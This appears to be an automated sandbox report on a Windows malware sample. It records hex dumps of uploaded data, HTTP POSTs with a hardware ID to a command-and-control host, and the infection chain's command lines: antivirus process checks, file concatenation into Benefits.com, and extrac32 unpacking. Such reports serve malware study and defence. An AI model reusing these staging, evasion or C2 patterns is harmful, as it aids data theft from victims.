                                    2025-01-31 18:55:37 UTC15331OUTData Raw: 41 dc 0f d1 9d e3 c3 2e 7a e2 78 eb d3 d9 9f 0f 4b 13 55 aa 04 80 05 dd 25 2c ad 53 aa 4d f3 c9 54 ce 96 77 75 ac 0f a7 3d f0 4d ad 3a 27 0e 35 fe 73 26 c6 0b 51 b1 bf 0e d9 f5 54 e2 e8 85 4f fb 8c ec 23 6f 37 10 11 42 98 81 ba e5 db 23 b3 ad 35 a2 9d ed 2b dd 3a b4 a0 2f c4 73 10 56 60 7e aa 8f ea 90 84 60 e8 af 77 6a 21 7d 1d 74 d5 0a 0b 64 6f 9d 7c 69 1d 45 7c b7 f8 e7 ea 04 36 e1 8f e2 ee 8b 44 95 0e 89 63 2f e7 06 be ce fd fe 49 e3 26 ef 41 53 e7 d4 0f 63 c7 54 02 d3 9f 40 91 fa 9d 47 f0 c5 e0 00 3b f2 3e fe b5 20 e0 15 bc 49 e7 3f 44 46 e8 00 7d 81 24 ab 70 e2 9c 3b 29 21 c4 34 e3 4b 25 1e 72 b9 99 bd d5 94 c3 55 2e 81 fc 70 09 7a 1f e6 56 67 2a 0e 54 70 c7 07 49 5f b1 2c dc e6 f7 eb 03 8f 21 7a 00 d4 ed 51 68 57 00 e1 36 2a 66 02 47 02 af 54 a0 bb
                                    Data Ascii: A.zxKU%,SMTwu=M:'5s&QTO#o7B#5+:/sV`~`wj!}tdo|iE|6Dc/I&AScT@G;> I?DF}$p;)!4K%rU.pzVg*TpI_,!zQhW6*fGT
                                    2025-01-31 18:55:37 UTC15331OUTData Raw: 85 c0 9d 51 ee 1f 1d 60 72 98 55 ee 85 a6 a3 82 41 98 00 72 c5 45 09 ec 2c 1c 3e 48 ea 99 17 4c ce ec 2f 4a 6a c9 0f 36 4f 29 e3 49 ac 5f b1 28 bc 8f fe 3c 94 84 42 88 4d 8a 62 6f fc 0d c1 f0 83 2a c0 ef 91 3a 6f 7f d4 8f 5d 6f 3f a5 38 a2 02 bc 95 2a 74 af 02 4b 9d f1 ce 07 f1 9b c7 12 cf cf 2a 13 5f 74 0a 00 3f 14 3b d2 37 dd 93 fa 72 97 cc 58 80 50 19 e2 81 04 5b 74 f6 b7 4e b8 d4 f4 20 d6 83 a8 10 21 25 d3 1d 21 aa 65 a2 9e d6 93 03 93 ea d5 d7 4b cd f5 61 fc 6b 79 c3 89 53 28 da 6d 35 89 5d 7c 23 5e 4a ec a4 48 3a 3d 6c 38 46 2d d0 8c 41 26 1b d1 61 7d 0c 48 58 af 1f 6a fa e3 1d fc dc 5b 56 e1 03 29 7e d8 5f bf c7 3a dc d7 b5 c2 1a f7 7f 9a 7d 56 79 05 d5 65 52 23 01 a4 aa 49 4c be 0f 85 cd ba 7c aa e0 79 61 0c 25 71 de 12 22 d6 95 d2 3b 84 cd 41 ec
                                    Data Ascii: Q`rUArE,>HL/Jj6O)I_(<BMbo*:o]o?8*tK*_t?;7rXP[tN !%!eKakyS(m5]|#^JH:=l8F-A&a}HXj[V)~_:}VyeR#IL|ya%q";A
                                    2025-01-31 18:55:37 UTC15331OUTData Raw: 82 60 31 23 d6 7b fd 80 ef e3 27 63 15 d3 6d eb 96 d7 61 a1 ef a2 d6 fc df f6 a8 a3 b3 ac ce f5 51 7f cb 63 88 3c e0 7b c4 91 0e 43 4a 74 58 54 c8 25 34 01 15 dc d1 97 33 75 22 a9 70 32 af ca 7a 67 57 28 b3 33 7d 3a 22 24 80 fd 4a de 3a 8d 3e c9 77 3c 4f 0b b5 e1 0d d7 fd 02 7d 42 0c 19 d6 f9 c2 1c eb 24 96 55 b3 2a 2a ca 22 69 ca 97 73 1e 60 ab f9 c7 67 5f ec 00 23 a5 db 3d 6f 65 57 7e 1c 0f b4 f9 a1 3b e1 37 26 d0 66 20 00 66 3e 52 85 bb c5 f0 08 b2 1e 52 fd a8 20 9e 58 18 b4 7c f5 53 e2 1f 82 27 37 da d7 40 e3 4e b0 27 52 49 9c 9c 63 8d f3 0a d8 82 46 aa 17 1a 82 b5 ef 64 66 46 90 75 39 5d ea 4d 1e fc 92 f2 31 fa 43 ac f4 c4 a9 97 f3 cd 3a 6b 17 92 30 1e 99 d1 b4 ff d0 74 dd 3d d6 05 fc 0b c4 fa 9b fc c0 2f fd 0a 1b 9d 69 a1 18 56 8e 21 6b 89 5f 52 06
                                    Data Ascii: `1#{'cmaQc<{CJtXT%43u"p2zgW(3}:"$J:>w<O}B$U**"is`g_#=oeW~;7&f f>RR X|S'7@N'RIcFdfFu9]M1C:k0t=/iV!k_R
                                    2025-01-31 18:55:37 UTC15331OUTData Raw: 20 5b 85 cb ca c2 dd 6b 39 ed b7 fe 8a f5 e2 b1 90 8d f2 57 fb 6a 2a a5 f4 d6 bc 2e bb 29 44 94 7d 53 51 bd fd 2d 40 43 1b 53 9a a8 55 24 7f d4 c7 64 a2 ba c8 b2 0d 70 8d 33 2c 4f 02 56 fd f0 b1 cd fe db 38 7f ba 9c 0b eb c0 14 df c3 e4 0e de 29 99 48 04 07 3b 25 02 de 64 b7 47 18 a7 ad 71 bf 51 2c fa 98 d8 dc b3 f0 97 de 51 2f 89 f1 bc 6e 6e ea d2 11 f3 72 09 68 fb 49 f9 8c ec 6c 35 af b6 0c 35 9c d1 ec 1d dd 1e fc 64 b2 26 fb d6 72 8c 1a f8 cb 3e 1c c2 6c 21 b8 30 7b 2f d0 9f fe a7 f6 3e 3b 49 6d 78 e0 ad da a0 4c 35 87 bd 25 08 d8 9f 32 b8 02 5d 87 c3 a6 97 7f 1d a3 9e dd fc 98 1b f4 69 b3 71 fb c3 f8 f6 4d 0c c8 1a 5b fc 45 a8 de 1a b5 d4 5b 5a 7c a8 a3 8a 73 40 d2 12 0b d8 9f 2d 65 e2 fb 35 79 3b da 11 34 79 d6 54 f3 ff f6 b3 ae a2 60 2d 8f 59 ae e4
                                    Data Ascii: [k9Wj*.)D}SQ-@CSU$dp3,OV8)H;%dGqQ,Q/nnrhIl55d&r>l!0{/>;ImxL5%2]iqM[E[Z|s@-e5y;4yT`-Y
                                    2025-01-31 18:55:37 UTC15331OUTData Raw: d7 48 66 b6 09 5e e3 7f 5c ff d1 7b 8b cb 09 37 47 fc 8c 60 18 44 00 ea 18 a6 d0 67 c5 30 e4 ea 9d ad ef bc b1 57 08 80 9c ea fc 3a 46 05 7c 2f f7 7a b0 62 1a 90 e9 c7 e6 7a 83 62 00 2d 1f 1d 75 7b 06 8f 6c 76 ba aa 51 88 2f 0a 48 a6 d1 3e c0 6a 30 28 7e a5 fe 37 66 a4 a2 6c 52 f4 a5 98 93 69 24 2f 0e 62 6a 6f 25 59 90 13 78 3b 8f e5 b6 19 f9 89 1d 29 e0 fb 75 91 8a 63 d8 0d 64 31 fa fe 7c ad a0 46 c1 b1 9c 05 2e aa 53 21 17 e1 c0 fb 5f 29 dc 77 3b 5a fe 8a c8 f5 fc 45 19 13 6b f3 c7 36 0c 74 11 7e 65 f2 3d 77 0e 5f 41 ff 1d 45 55 9a 33 4f b6 ba c1 bc 09 c5 46 47 f8 b3 33 10 a4 d4 68 1f fc 68 48 ed 80 5e 1a c8 ac 6f b9 e9 07 78 7a 1c a3 c2 b2 d6 c4 db d9 52 27 0d fc 49 47 bf ad 9f 6a 17 e9 a9 10 17 ad 79 b9 b5 99 b8 6d aa 9f 91 4a 85 a9 8f 4f 69 5b 0b 92
                                    Data Ascii: Hf^\{7G`Dg0W:F|/zbzb-u{lvQ/H>j0(~7flRi$/bjo%Yx;)ucd1|F.S!_)w;ZEk6t~e=w_AEU3OFG3hhH^oxzR'IGjymJOi[
                                    2025-01-31 18:55:37 UTC15331OUTData Raw: e4 39 96 df 1f 67 8f 95 b1 b6 76 b2 0a 94 de aa 08 c2 32 af 67 a1 89 7b 51 f3 3b 24 4e dc 09 ab 4a 76 75 cc a5 98 56 40 82 c2 d9 bf 1c f7 08 15 49 d3 95 e4 a8 c3 ab 48 7a 75 7e 8e 9f ed 79 4f d4 4b eb 22 50 f7 df 6f bb 0b 68 04 de 22 08 f7 15 2b ec ff 31 00 a6 72 6a d7 ad 7c 04 2d 3c fc 2e f1 49 f9 e5 89 ba 0b 74 f8 61 1e 7d b6 78 be ef f9 cd 53 54 bf 95 fd 74 4c 67 5c 99 5b 23 f9 0a 77 2b 7e cb f2 c8 34 a9 0c e1 ac 63 3d 7c 79 24 4f 78 58 a8 7d c4 6c 5c e5 83 d1 ea da 15 56 ed d8 3d 25 81 1b 58 8c 30 21 dc 1b df 3d a9 d4 6e fe b5 49 40 58 71 96 91 d4 6b 2f d6 2d 17 57 80 63 e4 58 ad 91 be dc 2b df e2 5e 18 d1 7a a7 41 36 1e bb 2b 4b 39 8b 32 43 9f 3a 76 1d 9b f3 b1 e1 a0 1a 5a f9 e3 74 fd 94 cb 8c 65 cf 16 2f 4f 55 5a e0 ea 1d 82 bf cd 55 a4 98 90 8a 80
                                    Data Ascii: 9gv2g{Q;$NJvuV@IHzu~yOK"Poh"+1rj|-<.Ita}xSTtLg\[#w+~4c=|y$OxX}l\V=%X0!=nI@Xqk/-WcX+^zA6+K92C:vZte/OUZU
                                    2025-01-31 18:55:37 UTC15331OUTData Raw: 65 ad b0 6c 21 94 a1 2e 7e bf b2 a7 e9 fd fe a8 40 cc cd bc f9 c7 6b a9 3a 0e 4f 64 99 0f b7 1f 7b 53 f1 74 31 79 b3 e1 ee 42 2c df 30 f1 cd f9 58 8b 68 38 16 16 6c 64 4e 91 1c 65 35 8e 5c f9 b9 e3 cf ef a3 b9 66 7d e5 1a ec a9 3d 48 7b 73 22 f1 8c 08 9f 88 95 4c af fa 72 89 67 88 9b a4 b0 cf 89 78 5b 52 7e df 41 46 ca 89 db 82 f2 d2 c4 13 92 e8 76 5e c5 da 46 09 f7 45 cd 5d 18 03 db 64 d4 16 dc da 10 27 ac bd b2 95 eb d0 f6 58 4a af c1 f0 2c 4a 44 d9 a4 07 4c 98 f0 12 7a b0 23 1e 10 23 89 d0 f0 a8 10 6d e8 41 5f 64 f1 5e b1 3f f5 e8 9a 9c 43 01 ec bb f5 ea 53 8b aa f8 0f a6 d9 d9 41 a2 62 ec 3b 11 81 bb 45 0e 13 0d c4 9c 23 a0 f9 89 55 f9 87 7a 46 5c fa 62 d3 93 74 69 eb 5c a2 33 fc 6b da a6 22 f7 2e 29 8a 34 b5 39 e1 fc 6b 6d e2 dc ba 3a e5 0c 1c 75 66
                                    Data Ascii: el!.~@k:Od{St1yB,0Xh8ldNe5\f}=H{s"Lrgx[R~AFv^FE]d'XJ,JDLz##mA_d^?CSAb;E#UzF\bti\3k".)49km:uf
                                    2025-01-31 18:55:38 UTC1139INHTTP/1.1 200 OK
                                    Date: Fri, 31 Jan 2025 18:55:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=vati114r9b20rn7mv7anue3vnf; expires=Sat, 01 Feb 2025 18:55:38 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FPN9U0YKmbGGlIFfgsHiMe2BWQbnG8oHbLa4Z62GIjxRqny2ZEgOtxCYW%2FSiOkCMjL19mGaLKwgl5VYecXq0HHxFgh0aejrjkY56f%2B9K1UAB6fk1%2BDieAsbpLfe7fGttcBitfFxQDQ%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90abeac148f24288-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1776&rtt_var=668&sent=195&recv=574&lost=0&retrans=0&sent_bytes=2853&recv_bytes=554386&delivery_rate=1635854&cwnd=246&unsent_bytes=0&cid=d2d1b39868d48156&ts=1644&x=0"


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.549941172.67.158.1514432636C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                    TimestampBytes transferredDirectionData
                                    2025-01-31 18:55:39 UTC269OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 83
                                    Host: vividimaginatigon.top
                                    2025-01-31 18:55:39 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 26 6a 3d 26 68 77 69 64 3d 34 34 45 43 31 34 31 42 31 35 36 38 41 44 34 31 33 37 41 38 39 31 31 37 31 45 38 36 30 37 43 30
                                    Data Ascii: act=get_message&ver=4.0&lid=c2CoW0--cheksa&j=&hwid=44EC141B1568AD4137A891171E8607C0
                                    2025-01-31 18:55:39 UTC1131INHTTP/1.1 200 OK
                                    Date: Fri, 31 Jan 2025 18:55:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=cceafmqonupc2j1r1i8sjp95oi; expires=Sat, 01 Feb 2025 18:55:39 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hd%2BZygEZ8SJ5i58vdZ6KPaWcU9OpfUttisFEbLEZ%2F0CydymVH%2Bt41QNVZ2FNibAKSlmLSaLmmQdA93IVZ6xLYGx3e4hLXxrV%2FsoFIWVpf3zFeygq8NboQ7GjXGyjNX5Cb3y3E5t16cI%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90abeaceec0a7d1a-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1808&rtt_var=693&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=988&delivery_rate=1561497&cwnd=179&unsent_bytes=0&cid=c87dd89f88c0bd1e&ts=534&x=0"
                                    2025-01-31 18:55:39 UTC54INData Raw: 33 30 0d 0a 4d 52 32 6b 54 67 56 67 56 6e 62 7a 55 74 70 6c 4e 33 7a 34 43 6a 44 6f 65 4e 42 51 71 4c 43 4d 51 6b 67 31 52 4f 78 6a 59 37 35 71 51 41 3d 3d 0d 0a
                                    Data Ascii: 30MR2kTgVgVnbzUtplN3z4CjDoeNBQqLCMQkg1ROxjY75qQA==
                                    2025-01-31 18:55:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:13:54:48
                                    Start date:31/01/2025
                                    Path:C:\Users\user\Desktop\setup.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\setup.exe"
                                    Imagebase:0x400000
                                    File size:83'896'395 bytes
                                    MD5 hash:C804E1074AF9D7CFFA16E6BD084BEA42
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:13:54:50
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\cmd.exe" /c copy Fashion Fashion.cmd & Fashion.cmd
                                    Imagebase:0x790000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:13:54:50
                                    Start date:31/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:13:54:50
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0x660000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:13:54:50
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /I "opssvc wrsa"
                                    Imagebase:0xe00000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:13:54:51
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                    Wow64 process (32bit):true
                                    Commandline:tasklist
                                    Imagebase:0x660000
                                    File size:79'360 bytes
                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:13:54:51
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                    Imagebase:0xe00000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:13:54:52
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c md 224177
                                    Imagebase:0x790000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:13:54:52
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\extrac32.exe
                                    Wow64 process (32bit):true
                                    Commandline:extrac32 /Y /E Wellington
                                    Imagebase:0x760000
                                    File size:29'184 bytes
                                    MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:10
                                    Start time:13:54:52
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\findstr.exe
                                    Wow64 process (32bit):true
                                    Commandline:findstr /V "Tranny" Yale
                                    Imagebase:0xe00000
                                    File size:29'696 bytes
                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:13:54:52
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c copy /b 224177\Benefits.com + Photographer + Vacuum + Separate + Valium + Continuing + Training + Hours + Kissing + Accepts + Verde + Quotations 224177\Benefits.com
                                    Imagebase:0x790000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:12
                                    Start time:13:54:53
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd /c copy /b ..\Searches + ..\Coordinated + ..\Students + ..\Approve + ..\There + ..\Molecular + ..\Updated y
                                    Imagebase:0x790000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:13
                                    Start time:13:54:53
                                    Start date:31/01/2025
                                    Path:C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                    Wow64 process (32bit):true
                                    Commandline:Benefits.com y
                                    Imagebase:0x870000
                                    File size:947'288 bytes
                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Has exited:true

                                    Target ID:14
                                    Start time:13:54:53
                                    Start date:31/01/2025
                                    Path:C:\Windows\SysWOW64\choice.exe
                                    Wow64 process (32bit):true
                                    Commandline:choice /d y /t 5
                                    Imagebase:0xfc0000
                                    File size:28'160 bytes
                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:17.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:20.7%
                                      Total number of Nodes:1526
                                      Total number of Limit Nodes:34
                                      execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 